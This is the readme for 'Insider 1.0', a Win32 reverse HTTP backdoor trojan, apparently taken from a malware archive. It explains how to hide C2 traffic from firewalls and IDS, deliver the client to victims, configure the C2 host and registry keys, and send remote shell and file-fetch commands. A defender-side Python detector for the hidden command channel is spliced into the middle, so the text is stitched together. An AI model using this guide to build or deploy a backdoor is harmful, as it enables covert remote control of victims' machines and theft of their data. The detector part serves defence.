Insider 1.0
(Trojan-Proxy.Win32.Agent.h)

by Nick

Written in C, compressed with UPX, source included

Released in July 2003



The Insider V1.0 -- Win32 reverse backdoor
[email protected] , Jul 21 2003
==========================================


Introduction
============

This is a reference implementation of a win32 reverse backdoor program
called the Insider. Unlike many other backdoor programs, Insider is not a
server listening on some tcp/udp port; it is a client program that communicates
with the server part over the http protocol. This design has some unique
features:

- Passes through almost any corporate firewall (it can automatically
  detect proxy settings if needed)
- No listening services show up in "netstat -an"
- Easy to hide from IDS - the communication looks like normal web browsing

Insider network consists of the following parts:

- Client(s) on victim machine(s)
- Server cgi script

Client programs are distributed in the usual way - send some executable to
the victim, do some ActiveX tricks, whatever. The cgi part can be installed
on any server that can execute cgi scripts - an anonymous hosting service
should be fine.

All communication consists of http POST requests, so the actual information is
not visible in proxy logs. Of course, the information can be sniffed, as
the messages are only base64 encoded (that might change in the future).
The client looks for a specific marker string hidden inside the returned web
page and executes any command it finds there. This marker is set with the
compile-time define PREFIX (you need this information later).

This release is the reference implementation; it works, but it requires some
work on the server side to get things going. It includes no fancy features
such as keyloggers, sniffers, etc. - just a plain command line interface.



Operation
=========

Clients are identified with a unique 32-character id which is sent to the server
every time the client has something to say.

After the initial execution, the client reads some settings from the registry
and sends the following information to the server:

User: Login (Real name)
Logon domain: Domainname
Location: Company (Country)
System: Operating system (Service pack)
Connection: Connection type

The cgi script "cc.cgi" included with the distribution stores each client
it sees in a directory named after the id. The initial information
is stored in the file "info" in that directory.

At this point, the server can send commands to the client. The following
commands are defined in the reference implementation:

 i		Send initial information
 x		Shutdown
 t min-max	Set the polling time random between min and max seconds
 f url file	Fetch file from url and store it as file
 s command	Run command with command interpreter (cmd.exe/command.com)

cc.cgi reads the command from the file "cmd" and writes the result to the file "result".


Example:

1. Client is installed on the victim machine.
2. The client's unique id is "c1b5e2adc491459a05f8d1b164ab66f"
3. Client sends the initial information to the server
4. Server makes a directory "c1b5e2adc491459a05f8d1b164ab66f" and stores
   the initial information as "c1b5e2adc491459a05f8d1b164ab66f/info"
5. Server reads the command "s ipconfig /all" from the file
   "c1b5e2adc491459a05f8d1b164ab66f/cmd" and sends the command to the client
6. Client executes the command and sends back the results
7. Server stores the result as "c1b5e2adc491459a05f8d1b164ab66f/result"
   and looks for a new command...
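A defender-side check for the command channel described above, added here as an
example and not part of the Insider distribution: it scans an HTML response body
for comments that start with the PREFIX marker, base64-decodes what follows, and
maps the first letter to the command table above. The default marker
"StartJavaScript=" is the one shown in insider.h in the Installation section; the
exact comment layout (marker immediately followed by the base64 text, surrounding
whitespace ignored) is an assumption, and the sample page is constructed.

```python
import base64
import binascii
import re

# Default PREFIX from insider.h. The real value is a compile-time setting of
# each build, so the detector takes it as a parameter.
DEFAULT_PREFIX = "StartJavaScript="

# Command letters as listed in the Operation section.
COMMANDS = {
    "i": "send initial information",
    "x": "shutdown",
    "t": "set polling interval (min-max seconds)",
    "f": "fetch url and store as file",
    "s": "run command with command interpreter",
}

# HTML comments; non-greedy so several comments on one page are found separately.
COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)


def parse_command(text):
    """Split a decoded command into letter and argument.

    Assumed layout: one command letter, whitespace, then the argument
    (e.g. "s ipconfig /all" -> cmd "s", arg "ipconfig /all").
    """
    parts = text.split(None, 1)
    if not parts:
        return None
    letter = parts[0]
    arg = parts[1] if len(parts) > 1 else ""
    return {"cmd": letter, "meaning": COMMANDS.get(letter, "unknown"), "arg": arg}


def extract_hidden_commands(html, prefix=DEFAULT_PREFIX):
    """Return one finding per HTML comment whose body starts with the prefix.

    A finding with decoded=None means the marker was present but the payload
    was not valid base64; that is still worth alerting on.
    """
    findings = []
    for match in COMMENT_RE.finditer(html):
        body = match.group(1).strip()
        if not body.startswith(prefix):
            continue
        payload = body[len(prefix):].strip()
        try:
            decoded = base64.b64decode(payload, validate=True).decode("latin-1")
            command = parse_command(decoded)
        except (binascii.Error, ValueError):
            decoded, command = None, None
        findings.append({"raw": payload, "decoded": decoded, "command": command})
    return findings


# Constructed sample: an ordinary page with one benign comment and one comment
# carrying the base64-encoded "s ipconfig /all" from the readme's example.
SAMPLE_COMMAND = "s ipconfig /all"
SAMPLE_PAGE = (
    "<html><head><title>Welcome</title></head><body>\n"
    "<!-- page generated by site-builder 2.1 -->\n"
    "<p>Nothing to see here.</p>\n"
    "<!-- " + DEFAULT_PREFIX
    + base64.b64encode(SAMPLE_COMMAND.encode()).decode() + " -->\n"
    "</body></html>\n"
)


def scan_sample():
    """Run the detector over the constructed page."""
    return extract_hidden_commands(SAMPLE_PAGE)


if __name__ == "__main__":
    for finding in scan_sample():
        cmd = finding["command"]
        if cmd is None:
            print("marker present but payload undecodable:", finding["raw"])
        else:
            print("hidden command %r -> %s, arg=%r"
                  % (cmd["cmd"], cmd["meaning"], cmd["arg"]))
```

In a proxy or IDS plugin, run extract_hidden_commands over each HTML response
body, passing prefix= when a sample has revealed a non-default marker; a comment
that carries the marker but fails to decode is reported too, since the marker
alone is the unusual part of an otherwise ordinary page.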



Installation
============

1. Edit file insider.h (or use precompiled binary in.exe, see section 2.)

- Change HOST, PORT and URL to that of your cgi:

/* Default host and port */
#define HOST    "someserver.com"
#define PORT    80

/* Base URL (no trailing semicolon: it would end up inside every expansion of URL) */
#define URL     "/cgi-bin/cc.cgi"

- Also, it might be a good idea to change the default prefix:

/* Comment prefix */
#define PREFIX  "StartJavaScript="



2. Run compile.bat (you need MS Visual C to do this).

- You should now have a binary insider.exe, size about 50K. Pack the file
if you feel like it (upx can squeeze it into 25K).

NOTE: You can also use the precompiled binary file in.exe and configure
the client using the following registry keys:

HKCU\Software\Microsoft\TaskManager\Host
HKCU\Software\Microsoft\TaskManager\Port
HKCU\Software\Microsoft\TaskManager\URL
HKCU\Software\Microsoft\TaskManager\Prefix

In that case, you must write the above registry values somehow during the
installation process. You can always rename in.exe if you wish.



3. Prepare your cgi

- Edit the variable PREFIX to fit your clients

- Take some web page and cut it into two parts, called header.txt and
footer.txt. The command is inserted as a base64-encoded message in an HTML
comment between the two parts:

(header.txt)
<!-- PREFIX -->
(footer.txt)

Of course, it could be as simple as a bare "<!-- PREFIX -->", but you might
want to make it look like someone is browsing a web site with real
content.


4. Distribute

- An example binder/installer is included in the directory "binder".


5. Wait for your clients to appear


6. Use your imagination.........




Still in progress
=================

- Proxy authentication
- The cgi is very stupid, make something more useful
- Message encryption
- Some control cgi script so that the whole thing can
  be controlled through web interface.



nick


size: 24,064 bytes

tested on Windows XP
September 29, 2005

MegaSecurity